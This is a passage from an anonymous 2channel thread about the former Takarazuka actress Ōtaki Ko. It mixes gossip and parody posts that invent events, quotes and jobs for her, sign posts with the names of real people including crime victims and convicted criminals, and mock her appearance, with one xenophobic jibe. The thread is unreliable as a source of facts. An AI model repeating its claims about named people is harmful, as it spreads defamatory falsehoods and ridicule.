大滝子さんが様々な方々に影響をお与えになったことはわかりました。
でも、いまひとつ69期との関係が掴みきれないのですが。
どなたか説明していただけませんか?

133 :名無しさん@花束いっぱい。:2007/01/05(金) 16:34:45 ID:bURfBluD
大滝子さんは麻路さきさんとご親戚だと伺っておりますわ。
そう言えば全体像が似てらっしゃいますもの。
さぞお金持ちの家系なのではと想像出来ますわね。

134 :名無しさん@花束いっぱい。:2007/01/05(金) 18:49:34 ID:+suP5sXg
大滝子さまは第二の春日野八千代と目されながら、歌劇団の反対を押し切って
退団なさいました。
ものすごい人気に「普通の女の子に戻りたい」と泣きじゃくっていた
愛くるしい姿が今でも脳裏に焼きついています。

千秋楽には退団を惜しむファンの列が大劇場出口から宝塚大橋を抜け西宮北口まで
続いたようです。
この模様はニューヨークタイムズにも『少女歌劇ドル箱スター失う』と
報じられました。

どうもこの時の歌劇団との確執が根深くOG扱いされない大きな理由と思われます。

135 :名無しさん@花束いっぱい。:2007/01/05(金) 20:04:57 ID:7FuMZQbI
331 :名無しさん@花束いっぱい。:2007/01/03(水) 16:43:19 ID:FmWKGpL+
大滝子さんは吉本興業第二の中山美保と目されていたから、歌劇団の早期退団懇願をごり押しで居座られ、
惜しむ関係者・ファンもなく、劇団史上最大の恥部トップで退団なさいました。
稀にもみない醜い容姿に、さすがの厚顔無恥の大滝子さんも「せめて普通の女並の容姿になりたい」と
日美クリニックの扉を叩いたという逸話は今でも脳裏に焼きついています。

千秋楽には退団を惜しむ親族らの“大ちゃんコール”が虚しく響きわたり、付近の住人や温泉街のお客達の
苦情が殺到、通報で駆けつけた保健所の職員に親族諸共拘束された様子が、翌月の町内たよりに一行掲載された模様です。

後に、・・事件で吉本興業への本格的舞台復帰も辞退を余儀なくされ、現在は”こずえ&みどり”路線で
後輩であり共通点も多い白鷺まどかさんと、各地の温泉街ドサまわりの日々を過ごされているそうです。

どうもこと時の吉本興業への執念が根強くあり、舞台女優へ復帰されない大きな理由と思われます。

136 :名無しさん@花束いっぱい。:2007/01/05(金) 20:17:40 ID:+suP5sXg
それでも私は大滝子さまに憧れてヅカを受験しました

                 白城あやか

137 :名無しさん@花束いっぱい。:2007/01/05(金) 21:10:56 ID:+suP5sXg
実は私も大滝子さまに憧れてヅカを受験しました

                 神奈美帆

138 :名無しさん@花束いっぱい。:2007/01/05(金) 22:21:50 ID:+suP5sXg
>大滝子さんが様々な方々に影響をお与えになったことはわかりました。
>でも、いまひとつ69期との関係が掴みきれないのですが。
>どなたか説明していただけませんか?

お問い合わせ有難うございます。

69期は人気が無く(入りが悪く)採算が合いません。

この為、演目を急遽変更し『大滝子ワンマンショー』と
させて頂きました。

何卒ご理解頂きますようお願い致します。

             2チャンネル事務局        

139 :名無しさん@花束いっぱい。:2007/01/05(金) 22:27:57 ID:+suP5sXg
http://www.skystage.net/program/img/200211/10_1.jpg

140 :名無しさん@花束いっぱい。:2007/01/06(土) 00:07:14 ID:DSmK7G7I
大滝子さんのフェルゼンが不評に終わったのは
やっぱりあのオバサン臭いマリ−アントワネットのせいだと思うわ。
もしあの時、アントワネットを白鷺さんや白原さん、若菜さん、瞳さんのような
可憐で演技力、歌唱力ともに確かな方が演じてたとしたら
大滝子さんの運命はまったく違ったものになっていたでしょう。

141 :名無しさん@花束いっぱい。:2007/01/06(土) 00:59:36 ID:a9Lfq+pL
>大滝子さんの運命はまったく違ったものになっていたでしょう。

ってーことは、やっぱり大滝子さまはヅカでは不評だったのね。

人の所為にしてはダメだわよん。

夢の舞台で、あの容姿+演技力等ではそりゃ不評でしょ。

せめて華やオーラでもあれば良かったでしょうけど。

142 :名無しさん@花束いっぱい。:2007/01/06(土) 09:42:47 ID:KDNvWoa9
このスレは閉鎖されました

143 :名無しさん@花束いっぱい。:2007/01/07(日) 11:23:22 ID:weIAFLxb
大滝子さんは今でも現役で活躍なさってるのですか?
今後の舞台などへの出演予定などをご存じであればお教えいただけるとありがたいです。


144 :名無しさん@花束いっぱい。:2007/01/07(日) 11:36:30 ID:9Wj9YTJ7
お問い合わせ有難うございます。

大滝子さまは『皇室アルバム』と「ユニセフ親善大使」として最悪の食料危機に陥っている
エチオピアやソマリアをはじめ、世界十数カ国をめぐる予定でございます。

                    総理府事務局

145 :名無しさん@花束いっぱい。:2007/01/07(日) 18:49:57 ID:0gs/ZVFT
>エチオピアやソマリアをはじめ、世界十数カ国をめぐる予定でございます。

先ずは祖国への援助から始めるのね。
とっととアフリカへお帰りっ。

146 :名無しさん@花束いっぱい。:2007/01/07(日) 20:42:40 ID:9Wj9YTJ7
>エチオピアやソマリアをはじめ、世界十数カ国をめぐる予定でございます。

>先ずは祖国への援助から始めるのね。
>とっととアフリカへお帰りっ。

はい 祖国オーストリアへ帰ります


147 :名無しさん@花束いっぱい。:2007/01/07(日) 21:03:12 ID:weIAFLxb
大滝子さんの出身ってオーストラリアだったの?

148 :名無しさん@花束いっぱい。:2007/01/08(月) 12:42:09 ID:NybcA8ZC
麻路さんの亭主って吉本のチャーリ−浜さんに似てるわね。
でも、よりによってなぜブラジルの方なんかとって思ってしまうわ。
遠くて大変じゃない?


149 :名無しさん@花束いっぱい。:2007/01/08(月) 15:55:49 ID:1Io1tgQ2
>麻路さんの亭主って吉本のチャーリ−浜さんに似てるわね。
>でも、よりによってなぜブラジルの方なんかとって思ってしまうわ。
>遠くて大変じゃない?

スレ違いはご遠慮ください

150 :名無しさん@花束いっぱい。:2007/01/09(火) 19:04:01 ID:+NKEdVCT
このスレは閉鎖されました

151 :名無しさん@花束いっぱい。:2007/01/09(火) 20:41:21 ID:3aRFkc6Y
大滝子さん、どなたからも入札がありませんでしたね。

ttp://page7.auctions.yahoo.co.jp/jp/auction/g47313615

152 :名無しさん@花束いっぱい。:2007/01/09(火) 20:59:09 ID:+NKEdVCT
>大滝子さん、どなたからも入札がありませんでしたね。

入札する必要などないわ。

だってあなた以外のひと皆持っているもの。

『長靴をはいた猫』ミリオンセラー


153 :名無しさん@花束いっぱい。:2007/01/09(火) 23:00:42 ID:o/riFlei
大滝子は飽きたから、同じ金銭問題系の汀夏子や、
上月晃あたりも参加してもらったらどうかな。

154 :名無しさん@花束いっぱい。:2007/01/09(火) 23:13:53 ID:+NKEdVCT
>大滝子は飽きたから、同じ金銭問題系の汀夏子や、
>上月晃あたりも参加してもらったらどうかな。

飽きたんならさっさとこのスレから出て行きな

                汀夏子


155 :名無しさん@花束いっぱい。:2007/01/09(火) 23:19:44 ID:+NKEdVCT
先程大滝子さまが北朝鮮に慰問に来られました

                横田めぐみ

156 :名無しさん@花束いっぱい。:2007/01/10(水) 00:25:35 ID:d0s5PGl/
妹のあやかが、無理矢理いただいた『わらじを履いたイノブタ』

知り合いに、下町のオバチャンが先輩にいたことがバレるのが恥かしくて

譲る事も出来ず、中古屋にも持っていけないと困ってますのよ。

ホント、いやだわ。恥かしいったらありゃしない。

                    私、沢口靖子…

157 :名無しさん@花束いっぱい。:2007/01/10(水) 18:48:30 ID:evVhZxWP
先程大滝子さまが和歌山刑務所に我々の慰問に来られました

                汀夏子

158 :名無しさん@花束いっぱい。:2007/01/10(水) 21:00:16 ID:evVhZxWP
うちにも慰問に来たわヨ

                上月晃

159 :名無しさん@花束いっぱい。:2007/01/10(水) 21:30:46 ID:e+6CBigK
なんかちょっとワンパターン化しているな
いつも同じような調子の文体の書き込みのあなた
最初の1、2回は面白かったけど
いい加減に趣向を変えてみたらどうかな

160 :名無しさん@花束いっぱい。:2007/01/10(水) 22:29:40 ID:dxF1qcSA
先程大滝子さまが精神病院にID:e+6CBigKの慰問に来られました

たいそう哀れみのお顔をなさっておられました

                看護婦長

161 :名無しさん@花束いっぱい。:2007/01/10(水) 22:58:12 ID:dxF1qcSA
>なんかちょっとワンパターン化しているな
>いつも同じような調子の文体の書き込みのあなた
>最初の1、2回は面白かったけど
>いい加減に趣向を変えてみたらどうかな

今婦長から連絡が有りました。

ID:e+6CBigKは私の姉です。

こんなところに顔を出して...お許し下さい。

                宮崎勤

162 :名無しさん@花束いっぱい。:2007/01/11(木) 02:15:04 ID:xuILxUB7
先程大滝子さまが和歌山刑務所に我々の慰問に来られました
林真須美さんのご親類の方たちと、面会者食堂で談笑されたそうです

                汀夏子


37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)